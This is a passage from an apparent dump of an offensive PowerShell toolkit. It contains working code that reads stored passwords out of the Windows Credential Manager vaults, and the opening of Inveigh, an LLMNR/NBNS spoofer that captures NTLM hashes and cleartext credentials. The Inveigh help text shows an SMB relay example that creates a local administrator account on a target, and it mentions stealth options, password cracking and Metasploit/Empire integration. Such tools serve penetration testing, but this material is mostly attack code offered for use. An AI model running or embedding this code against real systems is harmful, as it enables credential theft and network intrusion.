                                       [Int32],\n                                                                 [Int32].MakeByRefType(),\n                                                                 [IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    if ($OSMajor -ge 6 -and $OSMinor -ge 2)\n    {\n        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',\n                                                          'vaultcli.dll',\n                                                          'Public, Static',\n                                                          [Reflection.CallingConventions]::Standard,\n                                                          [Int32],\n                                                          [Type[]] @([IntPtr],\n                                                                     [Guid].MakeByRefType(),\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [Int32],\n                                                                     [IntPtr].MakeByRefType()),\n                                                          [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                          [Runtime.InteropServices.CharSet]::Auto)\n    }\n    else\n    {\n        $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',\n                                                          'vaultcli.dll',\n                                                          'Public, Static',\n                                                          [Reflection.CallingConventions]::Standard,\n                                                          [Int32],\n                                                          [Type[]] @([IntPtr],\n                                                                     [Guid].MakeByRefType(),\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [Int32],\n                                                                     [IntPtr].MakeByRefType()),\n                                                          [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                          [Runtime.InteropServices.CharSet]::Auto)\n    }\n\n    $Vaultcli = $TypeBuilder.CreateType()\n    #endregion\n\n    # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct.\n    function local:Get-VaultElementValue\n    {\n        Param (\n            [ValidateScript({$_ -ne [IntPtr]::Zero})]\n            [IntPtr]\n            $VaultElementPtr\n        )\n\n        $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT)\n        $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16)\n\n        switch ($PartialElement.Type)\n        {\n            $VAULT_ELEMENT_TYPE::String {\n                $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)\n                [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Boolean {\n                [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Short {\n                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::UnsignedShort {\n                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Int {\n                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::UnsignedInt {\n                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Double {\n                [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double])\n            }\n\n            $VAULT_ELEMENT_TYPE::Guid {\n                [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])\n            }\n\n            $VAULT_ELEMENT_TYPE::Sid {\n                $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)\n                Write-Verbose \"0x$($SidPtr.ToString('X8'))\"\n                $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)\n                $SidObject.Value\n            }\n\n            # These elements are currently unimplemented.\n            # I have yet to see these used in practice.\n            $VAULT_ELEMENT_TYPE::ByteArray { $null }\n            $VAULT_ELEMENT_TYPE::TimeStamp { $null }\n            $VAULT_ELEMENT_TYPE::ProtectedArray { $null }\n            $VAULT_ELEMENT_TYPE::Attribute { $null }\n            $VAULT_ELEMENT_TYPE::Last { $null }\n        }\n    }\n\n    $VaultCount = 0\n    $VaultGuidPtr = [IntPtr]::Zero\n    $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr)\n\n    if ($Result -ne 0)\n    {\n        throw \"Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))\"\n    }\n\n    $GuidAddress = $VaultGuidPtr\n\n    $VaultSchema = @{\n        ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note'\n        ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential'\n        ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector'\n        ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials'\n        ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials'\n        ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential'\n        ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential'\n        ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential'\n        ([Guid] '00000000-0000-0000-0000-000000000000') = $null\n    }\n\n    if ($VaultCount)\n    {\n        foreach ($i in 1..$VaultCount)\n        {\n            $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid])\n            $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid]))\n\n            $VaultHandle = [IntPtr]::Zero\n\n            Write-Verbose \"Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))\"\n\n            $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle)\n\n            if ($Result -ne 0)\n            {\n                Write-Error \"Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))\"\n                continue\n            }\n\n            $VaultItemCount = 0\n            $VaultItemPtr = [IntPtr]::Zero\n\n            $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr)\n\n            if ($Result -ne 0)\n            {\n                $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)\n                Write-Error \"Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))\"\n                continue\n            }\n\n            $StructAddress = $VaultItemPtr\n\n            if ($VaultItemCount)\n            {\n                foreach ($j in 1..$VaultItemCount)\n                {\n                    $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM)\n                    $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM))\n\n                    $PasswordVaultItem = [IntPtr]::Zero\n\n                    if ($OSMajor -ge 6 -and $OSMinor -ge 2)\n                    {\n                        $Result = $Vaultcli::VaultGetItem($VaultHandle,\n                                                          [Ref] $CurrentItem.SchemaId,\n                                                          $CurrentItem.pResourceElement,\n                                                          $CurrentItem.pIdentityElement,\n                                                          $CurrentItem.pPackageSid,\n                                                          [IntPtr]::Zero,\n                                                          0,\n                                                          [Ref] $PasswordVaultItem)\n                    }\n                    else\n                    {\n                        $Result = $Vaultcli::VaultGetItem($VaultHandle,\n                                                          [Ref] $CurrentItem.SchemaId,\n                                                          $CurrentItem.pResourceElement,\n                                                          $CurrentItem.pIdentityElement,\n                                                          [IntPtr]::Zero,\n                                                          0,\n                                                          [Ref] $PasswordVaultItem)\n                    }\n\n                    $PasswordItem = $null\n\n                    if ($Result -ne 0)\n                    {\n                        Write-Error \"Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))\"\n                        continue\n                    }\n                    else\n                    {\n                        $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM)\n                    }\n\n                    if ($VaultSchema.ContainsKey($VaultGuid))\n                    {\n                        $VaultType = $VaultSchema[$VaultGuid]\n                    }\n                    else\n                    {\n                        $VaultType = $VaultGuid\n                    }\n\n                    if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero)\n                    {\n                        $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement\n                    }\n                    else\n                    {\n                        $Credential = $null\n                    }\n\n                    $PackageSid = $null\n\n                    if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))\n                    {\n                        $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid\n                    }\n\n\n                    $Properties = @{\n                        Vault = $VaultType\n                        Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }\n                        Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }\n                        PackageSid = $PackageSid\n                        Credential = $Credential\n                        LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)\n                    }\n\n                    $VaultItem = New-Object PSObject -Property $Properties\n                    $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM'\n\n                    $VaultItem\n\n                    $null = $Vaultcli::VaultFree($PasswordVaultItem)\n                }\n            }\n\n            $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)\n        }\n    }\n}\n"
  },
  {
    "path": "modules/Inveigh.ps1",
    "content": "function Invoke-Inveigh\n{\n<#\n.SYNOPSIS\nInvoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/HTTPS/SMB.\n\n.DESCRIPTION\nInvoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features:\n\n    IPv4 LLMNR/NBNS spoofer with granular control\n    NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB\n    Basic auth cleartext credential capture over HTTP/HTTPS\n    WPAD server capable of hosting a basic or custom wpad.dat file\n    HTTP/HTTPS server capable of hosting limited content\n    Granular control of console and file output\n    Run time control\n\n.PARAMETER IP\nSpecify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if\nthe SpooferIP parameter is not set.\n\n.PARAMETER SpooferIP\nSpecify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a\nsystem other than the Inveigh host.\n\n.PARAMETER SpooferHostsReply\nDefault = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.\n\n.PARAMETER SpooferHostsIgnore\nDefault = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.\n\n.PARAMETER SpooferIPsReply\nDefault = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.\n\n.PARAMETER SpooferIPsIgnore\nDefault = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.\n\n.PARAMETER SpooferRepeat\nDefault = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user\nchallenge/response has been captured.\n\n.PARAMETER LLMNR\nDefault = Enabled: (Y/N) Enable/Disable LLMNR spoofing.\n\n.PARAMETER LLMNRTTL\nDefault = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet.\n\n.PARAMETER NBNS\nDefault = Disabled: (Y/N) Enable/Disable NBNS spoofing.\n\n.PARAMETER NBNSTTL\nDefault = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.\n\n.PARAMETER NBNSTypes\nDefault = 00,20: Comma separated list of NBNS types to spoof.\nTypes include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name\n\n.PARAMETER HTTP\nDefault = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.\n\n.PARAMETER HTTPS\nDefault = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in\nthe local store and attached to port 443. If the script does not exit gracefully, execute \n\"netsh http delete sslcert ipport=0.0.0.0:443\" and manually remove the certificate from \"Local Computer\\Personal\"\nin the cert store.\n\n.PARAMETER HTTPAuth\nDefault = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not\napply to wpad.dat requests.\n\n.PARAMETER HTTPBasicRealm\nSpecify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.\n\n.PARAMETER HTTPDir\nSpecify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener.\n\n.PARAMETER HTTPDefaultFile\nSpecify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used\nfor wpad.dat requests.\n\n.PARAMETER HTTPDefaultEXE\nSpecify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. \n\n.PARAMETER HTTPResponse\nSpecify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat\nrequests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. \n\n.PARAMETER HTTPSCertAppID\nSpecify a valid application GUID for use with the ceriticate.\n\n.PARAMETER HTTPSCertThumbprint\nSpecify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in\nthe current working directory and named Inveigh.pfx.\n\n.PARAMETER WPADAuth\nDefault = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests.\nSetting to Anonymous can prevent browser login prompts.\n\n.PARAMETER WPADEmptyFile\nDefault = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.\nEnabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when\nusing WPADIP, WPADPort, or WPADResponse.\n\n.PARAMETER WPADIP\nSpecify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter\nmust be used with WPADPort.\n\n.PARAMETER WPADPort\nSpecify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter\nmust be used with WPADIP.\n\n.PARAMETER WPADDirectHosts\nComma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the\ndefined proxy.\n\n.PARAMETER WPADResponse\nSpecify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and\nWPADPort are set. Use PowerShell character escapes where necessary.\n\n.PARAMETER SMB\nDefault = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still\ndirect targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to\nprevent login requests from being processed by the Inveigh host.  \n\n.PARAMETER Challenge\nDefault = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a\nrandom challenge will be generated for each request. This will only be used for non-relay captures.\n\n.PARAMETER MachineAccounts\nDefault = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.\n\n.PARAMETER SMBRelay\nDefault = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory.\n\n.PARAMETER SMBRelayTarget\nIP address of system to target for SMB relay.\n\n.PARAMETER SMBRelayCommand\nCommand to execute on SMB relay target.\n\n.PARAMETER SMBRelayUsernames\nDefault = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and\ndomain\\username format. \n\n.PARAMETER SMBRelayAutoDisable\nDefault = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.\n\n.PARAMETER SMBRelayNetworkTimeout\nDefault = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay\n target after each packet is sent.\n\n.PARAMETER ConsoleOutput\nDefault = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to\nensure that it doesn't hang the shell.\n\n.PARAMETER ConsoleStatus\n(Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for\ndisplaying full capture lists when running through a shell that does not have access to the support functions.\n\n.PARAMETER ConsoleUnique\nDefault = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,\nand username combinations when real time console output is enabled.\n\n.PARAMETER FileOutput\nDefault = Disabled: (Y/N) Enable/Disable real time file output.\n\n.PARAMETER FileUnique\nDefault = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname,\nand username combinations when real time file output is enabled.\n\n.PARAMETER StatusOutput\nDefault = Enabled: (Y/N) Enable/Disable startup and shutdown messages.\n\n.PARAMETER OutputStreamOnly\nDefault = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if\nrunning Inveigh through a shell that does not return other output streams.Note that you will not see the various\nyellow warning messages if enabled.\n\n.PARAMETER OutputDir\nDefault = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must\nalso be enabled.\n\n.PARAMETER RunTime\n(Integer) Set the run time duration in minutes.\n\n.PARAMETER ShowHelp\nDefault = Enabled: (Y/N) Enable/Disable the help messages at startup.\n\n.PARAMETER Inspect\n(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.\n\n.PARAMETER Tool\nDefault = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's\nInteractive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire   \n\n.EXAMPLE\nImport-Module .\\Inveigh.psd1;Invoke-Inveigh\nImport full module and execute with all default settings.\n\n.EXAMPLE\n. ./Inveigh.ps1;Invoke-Inveigh -IP 192.168.1.10\nDot source load and execute specifying a specific local listening/spoofing IP.\n\n.EXAMPLE\nInvoke-Inveigh -IP 192.168.1.10 -HTTP N\nExecute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response.\n\n.EXAMPLE\nInvoke-Inveigh -SpooferRepeat N -WPADAuth Anonymous -SpooferHostsReply host1,host2 -SpooferIPsReply 192.168.2.75,192.168.2.76\nExecute with the stealthiest options.\n\n.EXAMPLE\nInvoke-Inveigh -Inspect\nExecute with LLMNR, NBNS, SMB, HTTP, and HTTPS disabled in order to only inpect LLMNR/NBNS traffic.\n\n.EXAMPLE\nInvoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N\nExecute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be\nuseful for sending traffic to a controlled Linux system on another subnet.\n\n.EXAMPLE\nInvoke-Inveigh -HTTPResponse \"<html><head><meta http-equiv='refresh' content='0; url=https://duckduckgo.com/'></head></html>\"\nExecute specifying an HTTP redirect response.\n\n.EXAMPLE\nInvoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand \"net user Dave Spring2016 /add && net localgroup administrators Dave /add\"\nExecute with SMB relay enabled with a command that will create a local administrator account on the SMB relay\ntarget.  \n\n.NOTES\n1. An elevated administrator or SYSTEM shell is needed.\n2. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture.\n3. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.\n4. SMB challenge/response captures are performed by sniffing over the host system's SMB service.\n5. HTTP challenge/response captures are performed with a dedicated listener.\n6. The local LLMNR/NBNS services do not need to be disabled on the host system.\n7. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.\n8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.\n9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.\n10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.\n\n.LINK\nhttps://github.com/Kevin-Robertson/Inveigh\n#>\n\n# Parameter default values can be modified in this section: \n[CmdletBinding()]\nparam\n( \n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$HTTP=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$HTTPS=\"N\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$SMB=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$LLMNR=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$NBNS=\"N\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$SpooferRepeat=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$ConsoleOutput=\"N\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$ConsoleUnique=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$FileOutput=\"N\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$FileUnique=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$StatusOutput=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$OutputStreamOnly=\"N\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$MachineAccounts=\"N\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$ShowHelp=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$SMBRelay=\"N\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$SMBRelayAutoDisable=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Y\",\"N\")][String]$WPADEmptyFile=\"Y\",\n    [parameter(Mandatory=$false)][ValidateSet(\"0\",\"1\",\"2\")][String]$Tool=\"0\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Anonymous\",\"Basic\",\"NTLM\")][String]$HTTPAuth=\"NTLM\",\n    [parameter(Mandatory=$false)][ValidateSet(\"Anonymous\",\"Basic\",\"NTLM\")][String]$WPADAuth=\"NTLM\",\n    [parameter(Mandatory=$false)][ValidateSet(\"00\",\"03\",\"20\",\"1B\",\"1C\",\"1D\",\"1E\")][Array]$NBNSTypes=@(\"00\",\"20\"),\n    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP=\"\",\n    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP=\"\",\n    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = \"\",\n    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget =\"\",\n    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir=\"\",\n    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir=\"\",\n    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge=\"\",\n    [parameter(Mandatory=$false)][Array]$SpooferHostsReply=\"\",\n    [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore=\"\",\n    [parameter(Mandatory=$false)][Array]$SpooferIPsReply=\"\",\n    [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore=\"\",\n    [parameter(Mandatory=$false)][Array]$SMBRelayUsernames=\"\",\n    [parameter(Mandatory=$false)][Array]$WPADDirectHosts=\"\",\n    [parameter(Mandatory=$false)][Int]$ConsoleStatus=\"\",\n    [parameter(Mandatory=$false)][Int]$LLMNRTTL=\"30\",\n    [parameter(Mandatory=$false)][Int]$NBNSTTL=\"165\",\n    [parameter(Mandatory=$false)][Int]$WPADPort=\"\",\n    [parameter(Mandatory=$false)][Int]$RunTime=\"\",\n    [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout=\"\",\n    [parameter(Mandatory=$false)][String]$HTTPBasicRealm=\"IIS\",\n    [parameter(Mandatory=$false)][String]$HTTPDefaultFile=\"\",\n    [parameter(Mandatory=$false)][String]$HTTPDefaultEXE=\"\",\n    [parameter(Mandatory=$false)][String]$HTTPResponse=\"\",\n    [parameter(Mandatory=$false)][String]$HTTPSCertAppID=\"00112233-4455-6677-8899-AABBCCDDEEFF\",\n    [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint=\"98c1d54840c5c12ced710758b6ee56cc62fa1f0d\",\n    [parameter(Mandatory=$false)][String]$WPADResponse=\"\",\n    [parameter(Mandatory=$false)][String]$SMBRelayCommand=\"\",\n    [parameter(Mandatory=$false)][Switch]$Inspect,\n    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter\n)\n\nif ($invalid_parameter)\n{\n    throw \"$($invalid_parameter) is not a valid parameter.\"\n}\n\nif(!$IP)\n{ \n    $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)\n}\n\nif(!$SpooferIP)\n{\n    $SpooferIP = $IP  \n}\n\nif($SMBRelay -eq 'Y')\n{\n\n    if(!$SMBRelayTarget)\n    {\n        throw \"You must specify an -SMBRelayTarget if enabling -SMBRelay\"\n    }\n\n    if(!$SMBRelayCommand)\n    {\n        throw \"You must specify an -SMBRelayCommand if enabling -SMBRelay\"\n    }\n\n    if($Challenge -or $HTTPDefaultFile -or $HTTPDefaultEXE -or $HTTPResponse -or $WPADIP -or $WPADPort -or $WPADResponse)\n    {\n        throw \"-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay\"\n    }\n    elseif($HTTPAuth -ne 'NTLM' -or $WPADAuth -eq 'Basic')\n    {\n        throw \"Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPADAuth Anonymous can be used when enabling -SMBRelay\"\n    }\n\n}\n\nif($HTTPDefaultFile -or $HTTPDefaultEXE)\n{\n\n    if(!$HTTPDir)\n    {\n        throw \"You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE\"\n    }\n\n}\n\nif($WPADIP -or $WPADPort)\n{\n\n    if(!$WPADIP)\n    {\n        throw \"You must specify a -WPADPort to go with -WPADIP\"\n    }\n\n    if(!$WPADPort)\n    {\n        throw \"You must specify a -WPADIP to go with -WPADPort\"\n    }\n\n}\n\nif(!$OutputDir)\n{ \n    $output_directory = $PWD.Path\n}\nelse\n{\n    $output_directory = $OutputDir\n}\n\nif(!$inveigh)\n{\n    $global:inveigh = [HashTable]::Synchronized(@{})\n    $inveigh.log = New-Object System.Collections.ArrayList\n    $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList\n    $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList\n    $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList\n    $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList\n    $inveigh.cleartext_list = New-Object System.Collections.ArrayList\n    $inveigh.IP_capture_list = New-Object System.Collections.ArrayList\n    $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList\n}\n\nif($inveigh.running)\n{\n    throw \"Invoke-Inveigh is already running, use Stop-Inveigh\"\n}\nelseif($inveigh.relay_running)\n{\n    throw \"Invoke-InveighRelay is already running, use Stop-Inveigh\"\n}\n\n$inveigh.sniffer_socket = $null\n\nif($inveigh.HTTP_listener.IsListening)\n{\n    $inveigh.HTTP_listener.Stop()\n    $inveigh.HTTP_listener.Close()\n}\n\n$inveigh.console_queue = New-Object System.Collections.ArrayList\n$inveigh.status_queue = New-Object System.Collections.ArrayList\n$inveigh.log_file_queue = New-Object System.Collections.ArrayList\n$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList\n$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList\n$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList\n$inveigh.certificate_application_ID = $HTTPSCertAppID\n$inveigh.certificate_thumbprint = $HTTPSCertThumbprint\n$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList\n$inveigh.console_output = $false\n$inveigh.console_input = $true\n$inveigh.file_output = $false\n$inveigh.log_out_file = $output_directory + \"\\Inveigh-Log.txt\"\n$inveigh.NTLMv1_out_file = $output_directory + \"\\Inveigh-NTLMv1.txt\"\n$inveigh.NTLMv2_out_file = $output_directory + \"\\Inveigh-NTLMv2.txt\"\n$inveigh.cleartext_out_file = $output_directory + \"\\Inveigh-Cleartext.txt\"\n$inveigh.HTTP_response = $HTTPResponse\n$inveigh.HTTP_directory = $HTTPDir\n$inveigh.HTTP_default_file = $HTTPDefaultFile\n$inveigh.HTTP_default_exe = $HTTPDefaultEXE\n$inveigh.WPAD_response = $WPADResponse\n$inveigh.challenge = $Challenge\n$inveigh.running = $true\n\nif($StatusOutput -eq 'Y')\n{\n    $inveigh.status_output = $true\n}\nelse\n{\n    $inveigh.status_output = $false\n}\n\nif($OutputStreamOnly -eq 'Y')\n{\n    $inveigh.output_stream_only = $true\n}\nelse\n{\n    $inveigh.output_stream_only = $false\n}\n\nif($Inspect)\n{\n    $LLMNR = \"N\"\n    $NBNS = \"N\"\n    $HTTP = \"N\"\n    $HTTPS = \"N\"\n    $SMB = \"N\"\n}\n\nif($Tool -eq 1) # Metasploit Interactive PowerShell\n{\n    $inveigh.tool = 1\n    $inveigh.output_stream_only = $true\n    $inveigh.newline = \"\"\n    $ConsoleOutput = \"N\"\n}\nelseif($Tool -eq 2) # PowerShell Empire\n{\n    $inveigh.tool = 2\n    $inveigh.output_stream_only = $true\n    $inveigh.console_input = $false\n    $inveigh.newline = \"`n\"\n    $ConsoleOutput = \"Y\"\n    $ShowHelp = \"N\"\n}\nelse\n{\n    $inveigh.tool = 0\n    $inveigh.newline = \"\"\n}\n\n# Write startup messages\n$inveigh.status_queue.Add(\"Inveigh started at $(Get-Date -format 's')\")  > $null\n$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - Inveigh started\")]) > $null\n$inveigh.status_queue.Add(\"Listening IP Address = $IP\")  > 